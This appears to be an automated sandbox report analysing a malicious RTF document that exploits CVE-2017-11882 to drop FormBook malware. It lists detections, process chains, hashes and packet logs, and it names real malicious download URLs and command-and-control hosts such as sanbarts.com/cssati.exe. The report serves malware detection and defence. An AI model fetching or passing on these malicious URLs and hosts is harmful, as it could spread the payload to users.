          Source: Yara matchFile source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts12
          Native API
          Path Interception612
          Process Injection
          1
          Rootkit
          1
          Credential API Hooking
          1
          System Time Discovery
          Remote Services1
          Credential API Hooking
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules
          Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Masquerading
          LSASS Memory251
          Security Software Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          Exfiltration Over Bluetooth14
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts23
          Exploitation for Client Execution
          Logon Script (Windows)Logon Script (Windows)2
          Virtualization/Sandbox Evasion
          Security Account Manager2
          Virtualization/Sandbox Evasion
          SMB/Windows Admin Shares1
          Clipboard Data
          Automated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection
          NTDS2
          Process Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer123
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets1
          Remote System Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common2
          Obfuscated Files or Information
          Cached Domain Credentials2
          File and Directory Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing
          DCSync125
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          [Behavior graph. ID: 635413; Sample: Revised RFQ-PO180911.doc; Start date: 27/05/2022; Architecture: WINDOWS; Score: 100. Process chain: EQNEDT32.EXE -> word.exe -> dvukljmnr.exe -> dvukljmnr.exe -> explorer.exe (injected) -> wuapp.exe -> cmd.exe; WINWORD.EXE started separately.]

          Source | Detection | Scanner | Label
          Revised RFQ-PO180911.doc | 32% | Virustotal |
          Revised RFQ-PO180911.doc | 32% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp | 100% | Avira | EXP/CVE-2018-0798.Gen
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe | 9% | Metadefender |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe | 62% | ReversingLabs | Win32.Trojan.FormBook
          C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | 69% | ReversingLabs | Win32.Trojan.GenericML
          C:\Users\user\AppData\Roaming\word.exe | 9% | Metadefender |
          C:\Users\user\AppData\Roaming\word.exe | 62% | ReversingLabs | Win32.Trojan.FormBook

          Source | Detection | Scanner | Label
          6.0.dvukljmnr.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.2.dvukljmnr.exe.160000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          6.0.dvukljmnr.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          6.2.dvukljmnr.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          6.0.dvukljmnr.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          No Antivirus matches

          Source | Detection | Scanner | Label
          http://www.sanbarts.com/YR$ | 0% | Avira URL Cloud | safe
          http://sanbarts.com/cssati.exe | 100% | Avira URL Cloud | malware
          www.rthearts.com/nk6l/ | 0% | Avira URL Cloud | safe
          http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
          http://www.sanbarts.com/cssati.exeC: | 0% | Avira URL Cloud | safe
          http://sanbarts.com/33 | 0% | Avira URL Cloud | safe
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
          http://www.sanbarts.com/Couri | 0% | Avira URL Cloud | safe
          http://treyresearch.net | 0% | URL Reputation | safe
          http://www.sanbarts.com/cssati.exekkC: | 0% | Avira URL Cloud | safe
          http://www.sanbarts.com/cssati.exe | 100% | Avira URL Cloud | malware
          http://java.sun.com | 0% | URL Reputation | safe
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
          http://www.createacarepack.com/nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi | 0% | Avira URL Cloud | safe
          http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://sanbarts.com/cssati.exej | 0% | Avira URL Cloud | safe
          http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          215ffbc1941f6023.7host.cn | 45.120.185.113 | true | true | | unknown
          sanbarts.com | 194.9.94.86 | true | true | | unknown
          sbsfe-p8.geo.mf0.yahoodns.net | 98.137.244.37 | true | true | | unknown
          www.sanbarts.com | unknown | unknown | true | | unknown
          www.paypal-caseid521.com | unknown | unknown | true | | unknown
          www.storyofsol.com | unknown | unknown | true | | unknown
          www.createacarepack.com | unknown | unknown | true | | unknown

          Name | Malicious | Antivirus Detection | Reputation
          http://sanbarts.com/cssati.exe | true | Avira URL Cloud: malware | unknown
          www.rthearts.com/nk6l/ | true | Avira URL Cloud: safe | low
          http://www.sanbarts.com/cssati.exe | true | Avira URL Cloud: malware | unknown
          http://www.createacarepack.com/nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi | true | Avira URL Cloud: safe | unknown

                                                      IP | Domain | Country | ASN | ASN Name | Malicious
                                                      194.9.94.86 | sanbarts.com | Sweden | 39570 | LOOPIASE | true
                                                      98.137.244.37 | sbsfe-p8.geo.mf0.yahoodns.net | United States | 36647 | YAHOO-GQ1US | true
                                                      45.120.185.113 | 215ffbc1941f6023.7host.cn | Hong Kong | 138415 | HENGDA-HKHENGDANETWORKLIMITEDHK | true

                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:635413
                                                      Start date and time: 2022-05-27 21:19:14 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 11m 34s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Sample file name:Revised RFQ-PO180911.doc
                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                      Number of analysed new started processes analysed:10
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.expl.evad.winDOC@11/14@5/3
                                                      EGA Information:
                                                      • Successful, ratio: 80%
                                                      HDC Information:
                                                      • Successful, ratio: 37.8% (good quality ratio 35.1%)
                                                      • Quality average: 76.2%
                                                      • Quality standard deviation: 30.3%
                                                      HCA Information:
                                                      • Successful, ratio: 98%
                                                      • Number of executed functions: 110
                                                      • Number of non-executed functions: 111
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .doc
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                      • Attach to Office via COM
                                                      • Scroll down
                                                      • Close Viewer
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                      • Execution Graph export aborted for target EQNEDT32.EXE, PID 1544 because there are no executed functions
                                                      • Not all processes were analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      Time      Type             Description
                                                      21:20:17  API Interceptor  120x Sleep call for process: EQNEDT32.EXE modified
                                                      21:20:29  API Interceptor  24x Sleep call for process: dvukljmnr.exe modified
                                                      21:20:57  API Interceptor  208x Sleep call for process: wuapp.exe modified
                                                      21:21:40  API Interceptor  1x Sleep call for process: explorer.exe modified
                                                      No context
                                                      Match  Associated Sample Name / URL  Detection
                                                      C:\Users\user\AppData\Local\Temp\dvukljmnr.exe  H7CLAWIF5W.exe  malicious
                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Category:downloaded
                                                        Size (bytes):299113
                                                        Entropy (8bit):7.946436383486754
                                                        Encrypted:false
                                                        SSDEEP:6144:B0YmjnZuHB7pD0VRQCReiNfi+UPKI//9d7j9OHv:WtgQnQJiNfipK81dQHv
                                                        MD5:C6E799EEEBA0345DE98B4E9A6AC76B82
                                                        SHA1:268BAFBD996997350D32521A0012602960C5D004
                                                        SHA-256:E17BFB8370C8BADF90756F650E1BE4794E77A57ABB3619C30789364756304759
                                                        SHA-512:B229294931FE70480A7CB0937B33311FA838E5B5F1AC880A1E8FD06B67DDEE6C4B691D9A0D93004BE86DEBA5300FAF55511CD910FAD56F89C4E79B5EEAD6F681
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Metadefender, Detection: 9%
                                                        • Antivirus: ReversingLabs, Detection: 62%
                                                        Reputation:low
                                                        IE Cache URL:http://www.sanbarts.com/cssati.exe
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                        Category:dropped
                                                        Size (bytes):5632
                                                        Entropy (8bit):3.977045300212439
                                                        Encrypted:false
                                                        SSDEEP:48:rvl2t0MPY8hiStDY0EDK4DZSZ3w/tC7DuDd/rSCD:LlxMPXIS9TWU3wQPudf
                                                        MD5:CF5C5EA5A46EFBC81FAB97BC32950071
                                                        SHA1:E9AFF9A0F369B22BE034E728D420742920443916
                                                        SHA-256:67D139F672BFDB09E84F5CFEB3B020C8C17EC70CE5035717ACBD878EA218BA57
                                                        SHA-512:8B8388C1B667AEA9892AF5347B12AEDD72EC4F5EF92FB052252FB0EE17ACB607CE82128C4D979A5D0C576006600DBDBD2B4CE169C2EAA6F7E2BA1FCF34742904
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Reputation:low
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1024
                                                        Entropy (8bit):0.980404169406617
                                                        Encrypted:false
                                                        SSDEEP:3:tlnBknLkylfgREqAWlglqlg7tlVl3llLr1lll8v0lglwZsl8gl7vlI7:RsLhNgREqAWlgFJ7lll8vlw2FrG
                                                        MD5:8738761EA2BF10FB35D99778619F54B5
                                                        SHA1:2C2AAC95B01964FC3883FFE659670A041CFCC132
                                                        SHA-256:943B941CA0D785F23DED5B8CB332830F66D60EFDBB2BB2175E5F34D39E251534
                                                        SHA-512:F8C03355DA8405BF2DA8AA694FA3DFD74267A3403DE239570F5837D6A786CD6ED6E0FDE60CF5DC2F5E2A2EB0B385FEE4D923789C6096A323C9E3E7F67CF40B89
                                                        Malicious:false
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1024
                                                        Entropy (8bit):0.05390218305374581
                                                        Encrypted:false
                                                        SSDEEP:3:ol3lYdn:4Wn
                                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Roaming\word.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):189439
                                                        Entropy (8bit):7.989126055665329
                                                        Encrypted:false
                                                        SSDEEP:3072:HkPmzAMnIFKBvGchRYsnPT5EZ5aRmNGWuSN7s+hYX/EXQEZxdMipBbK91yvrCVA:Hy0ZnWWvtRfPTCZ5OmfYvEXvxdtpTuVA
                                                        MD5:17179B4032C3411541C24CA24C8C9AAE
                                                        SHA1:13F54B0C026B6C7E53AA94DF8F73FA24ECAA0393
                                                        SHA-256:B82CA9A52D0AC42AEB246ED7FA0FD7F95C6248F6684B1AB8E6D973EE934CE0B9
                                                        SHA-512:6127E76EEC4D121BE3EE8A45DA44220A33AC57924255738F80EDAB3B92A7FD7D8F002779FA0F3296F3B795671767853E49DD2642EB43419E373284BFBD8B0201
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Roaming\word.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):191488
                                                        Entropy (8bit):6.541898820880567
                                                        Encrypted:false
                                                        SSDEEP:3072:afbnR6BqNvncvhwj8H0o45It38FSDblJpeKdsa9:MpvncWs0o4at3l9
                                                        MD5:9CECB9E88C1FF3D7A4FFC8BFEB27C2E1
                                                        SHA1:63223BA95BFA3BF5C33B2FA08376AFC90B35465E
                                                        SHA-256:78C9548A33ABD68ED553BB2A48166AFD21041B9D868A0373E4A11B93409DB049
                                                        SHA-512:BE4365F78F9DA5D3AB920100DEBF9A23F94101C5482DB6FBB8708913006483DF0A6DC882BAAC4D11EB942B464E548AC4F31A044F13FE6670B68DA1B95A2FDAAE
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 69%
                                                        Joe Sandbox View:
                                                        • Filename: H7CLAWIF5W.exe, Detection: malicious
                                                        Process:C:\Users\user\AppData\Roaming\word.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):392249
                                                        Entropy (8bit):7.457203020718996
                                                        Encrypted:false
                                                        SSDEEP:6144:QPy0ZnWWvtRfPTCZ5OmfYvEXvxdtpTuVOQz8jpvncWs0o4at3l9:UDZWqno5OmfYvqxd4dz81cWsIab9
                                                        MD5:6D2C377D4EAA999F9049920017F0AEBE
                                                        SHA1:C60DEEBEF6AB6F06B13801186B82B30B7EC07CF9
                                                        SHA-256:92820C32038F81C895428B292EBF5221903830336E08979AD68E54C1060B6DD8
                                                        SHA-512:588C7840DE4D228C65BA594F9837C4C29E5EB16E98FF0CE71584414CA46F396E25E45D447297D42111D743920A601902EC26EF5150501591D5CADF6DC7423956
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Roaming\word.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4830
                                                        Entropy (8bit):6.200355296128427
                                                        Encrypted:false
                                                        SSDEEP:96:lEgwdw+mcaoVVlbspZr/phpQDrbCGmrTJp4Fd0ZNN7juiOR/:11g/c/pQ3DFqBUR/
                                                        MD5:498C16613E82CEBCA0FC1541214BE952
                                                        SHA1:23E7DA2AA1B3EF5F3AEC1AE51F797DA4F421EFC5
                                                        SHA-256:7F40DA6288C8E939AFEA7A6512E518933D1802F6B822817B21E3B457AF445CE8
                                                        SHA-512:BA6B040C01B60827F893F918DE5478E83B53DA511EF62D0B10B2A12EC17F64C2FF64BD50DC1BE814809153AE90C913370010BACF22636FBD4820B409E6183A7B
                                                        Malicious:false
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:54 2022, mtime=Tue Mar 8 15:45:54 2022, atime=Sat May 28 03:20:14 2022, length=4205, window=hide
                                                        Category:dropped
                                                        Size (bytes):1064
                                                        Entropy (8bit):4.561334084261307
                                                        Encrypted:false
                                                        SSDEEP:12:8J2LpgXg/XAlCPCHaXBKBnB/xQpX+WhsxaibJticvbc2AksJJDtZ3YilMMEpxRlb:8J2T/XTRKJIoxtb2eQ243Dv3qIY7h
                                                        MD5:7A0827D76EE99E21650DB99266382AA1
                                                        SHA1:8D3328AF1607BCBA9B99539719B3C101BD51BE2D
                                                        SHA-256:EEB5D0D80D9AE296DA2B4B4D1BF6AFC4B5CBCACCF2C2948C7D4581971015CE6E
                                                        SHA-512:E5A6713869D093AA09994BA31D61067AE1360950331B8034AF17B0D7767DAA6EB63D5D4CCA1ED2C2AC44E112B110235F192D6E6DE15BF07C592C8EA4DDD70006
                                                        Malicious:false
                                                        Preview:L..................F.... ....<a..3...<a..3.....:Jr..m............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2.m....T." .REVISE~1.DOC..^......hT..hT..*...r.....'...............R.e.v.i.s.e.d. .R.F.Q.-.P.O.1.8.0.9.1.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop\Revised RFQ-PO180911.doc./.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.e.v.i.s.e.d. .R.F.Q.-.P.O.1.8.0.9.1.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......936905..........D_..
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):91
                                                        Entropy (8bit):4.905985646870587
                                                        Encrypted:false
                                                        SSDEEP:3:bDuMJlvDzndVOLprXCmX1mQzndVOLprXCv:bCkHn+dzxn+dzs
                                                        MD5:CEBD1CC56D43DF635440E2ED8B4A5B04
                                                        SHA1:EF8682C6F0816F2C59F2F69BDE5FBF5C13133FCF
                                                        SHA-256:1A97AB0D3F171BB80E32696C0F6125743C6F20AEBA4B3FA4529EDB8277554681
                                                        SHA-512:8DC534B70B012E0E9CEDDAD42D133892FBDA6003F85E14CED563F3BC81169B81AC9A0ABE0D896E48D0A96B2DEC130067F08042EBF0EA63228DF458531E283350
                                                        Malicious:false
                                                        Preview:[folders]..Templates.LNK=0..Revised RFQ-PO180911.LNK=0..[doc]..Revised RFQ-PO180911.LNK=0..
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):162
                                                        Entropy (8bit):2.4797606462020303
                                                        Encrypted:false
                                                        SSDEEP:3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
                                                        MD5:1674A1C7C99CD9FAADA789F5E2AEB335
                                                        SHA1:26D9E81D5ED584A899A94D5EA8945A5AE3403F85
                                                        SHA-256:BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
                                                        SHA-512:B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
                                                        Malicious:false
                                                        Preview:.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):2
                                                        Entropy (8bit):1.0
                                                        Encrypted:false
                                                        SSDEEP:3:Qn:Qn
                                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                        Malicious:false
                                                        Preview:..
                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Category:dropped
                                                        Size (bytes):299113
                                                        Entropy (8bit):7.946436383486754
                                                        Encrypted:false
                                                        SSDEEP:6144:B0YmjnZuHB7pD0VRQCReiNfi+UPKI//9d7j9OHv:WtgQnQJiNfipK81dQHv
                                                        MD5:C6E799EEEBA0345DE98B4E9A6AC76B82
                                                        SHA1:268BAFBD996997350D32521A0012602960C5D004
                                                        SHA-256:E17BFB8370C8BADF90756F650E1BE4794E77A57ABB3619C30789364756304759
                                                        SHA-512:B229294931FE70480A7CB0937B33311FA838E5B5F1AC880A1E8FD06B67DDEE6C4B691D9A0D93004BE86DEBA5300FAF55511CD910FAD56F89C4E79B5EEAD6F681
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Metadefender, Detection: 9%, Browse
                                                        • Antivirus: ReversingLabs, Detection: 62%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........qJ...$...$...$./.{...$...%.;.$.".y...$..3....$.f."...$.Rich..$.........................PE..L.....iF.................Z...........2.......p....@..........................................................................s.......................................................................................p...............................text....Y.......Z.................. ..`.rdata..z....p.......^..............@..@.data...............p..............@....ndata.......@...........................rsrc................t..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):162
                                                        Entropy (8bit):2.4797606462020303
                                                        Encrypted:false
                                                        SSDEEP:3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
                                                        MD5:1674A1C7C99CD9FAADA789F5E2AEB335
                                                        SHA1:26D9E81D5ED584A899A94D5EA8945A5AE3403F85
                                                        SHA-256:BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
                                                        SHA-512:B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
                                                        Malicious:false
                                                        Preview:.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...
                                                        File type:data
                                                        Entropy (8bit):4.757042986275398
                                                        TrID:
                                                        • Rich Text Format (4004/1) 100.00%
                                                        File name:Revised RFQ-PO180911.doc
                                                        File size:4205
                                                        MD5:afaa3f4a9a241593ea30e05773c22980
                                                        SHA1:1d9dabc7f48e7d3c50c3d7d36a371be6bb63746d
                                                        SHA256:25966cc19f04cbbdacdf04249247d606c037cb527669addbfb0d52e0cd948519
                                                        SHA512:dd13ab1647bda04ee24a67f858c477657a7029d25a03f704b5d946930b75886f3f04360b132631d220709ccf4430ce40871033441510fba5923a8355c3f1816b
                                                        SSDEEP:96:rXNv4zQBSRu6lT85c98HwedaKR/UHpTQXbfZauPjspq:r9ALHTqc98Q2fR/UJTQXjAo
                                                        TLSH:7B815D33B65C5EA7D729C5FD424B7D569252F1670FCFA840315CD99003697B08A6C1E1
                                                        File Content Preview:{\rtF3245{\object53103277 \objocx88498732\objw1025\objh9295{\*\objdata913763 {\bin00000000 {\*\objdata913763 } \*\from771564180771564180 HSSnyM9uPxlyjjXd27hWYJB7.59Zdx5NZFDEVBRnWKalWrjLy4Xp790TBCTh1QhPwoRhik6h23}.{\*\ensp
                                                        Icon Hash:e4eea2aaa4b4b4a4
                                                        Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                        May 27, 2022 21:20:09.418041945 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.418071032 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.418082952 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.418507099 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.502178907 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.502218008 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.502235889 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.502253056 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.502269983 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.502373934 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.503268003 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.533480883 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.533521891 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.533545971 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.533566952 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.533590078 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.533611059 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.533637047 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.533664942 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.533709049 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.533765078 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.533771992 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.533778906 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.580378056 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.580405951 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.580425978 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.580444098 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.580465078 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.580504894 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.580524921 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.580527067 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.580529928 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.580547094 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.580568075 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.580576897 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.580601931 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.580612898 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.605880976 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.605914116 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.605964899 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.605992079 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.627268076 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.627300024 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.627317905 CEST804917445.120.185.113192.168.2.22
